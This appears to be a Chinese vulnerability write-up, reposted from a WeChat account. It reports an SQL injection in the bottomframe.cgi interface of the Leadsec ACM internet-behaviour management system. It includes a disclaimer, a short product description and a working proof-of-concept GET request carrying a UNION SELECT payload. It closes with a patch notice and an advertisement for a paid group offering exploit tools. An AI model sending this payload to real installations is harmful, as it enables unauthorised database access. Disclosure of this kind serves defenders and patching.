01
团队声明
该漏洞为我团队漏洞监测平台发现,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
02
漏洞概述
本篇文章提供的原创工具在知识星球,提供源代码。
CVE CNNVD CNVD编号:暂无
网御上网行为管理系统具备一体化网络接入、认证、管控、优化、审计、运营等功能,是新一代高性能的上网行为管理产品。面向政府、军工、金融、教育、企业等多行业不同客户网络业务场景,简化管理,节约客户成本,提供业务效率和价值。
网御上网行为管理系统(简称Leadsec ACM)是网御为互联网接入用户在信息内容安全、网络应用管理、组织运营效率、网络资源利用、法律风险规避及网络投资回报等方面提供的全方位解决方案。网御上网行为管理系统存在SQL注入漏洞。
网御 ACM上网行为管理系统 bottomframe.cgi接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限进行敏感操作。
03
影响版本
网御 ACM 上网行为管理系统
04
漏洞复现
GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
执行user()
05
修复建议
目前厂商已经发布了升级补丁。可以到官网网站查看并升级。
06
加入星球
我们入驻星球啦!加入知识星球,我们会发步一些原创工具,前50名加入星球¥199.00并赠送一本¥109.0的书。
07
关注我们
原文始发于微信公众号(小白嘿课):【严重】网御ACM上网行为管理系统存在SQL注入漏洞复现以及工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论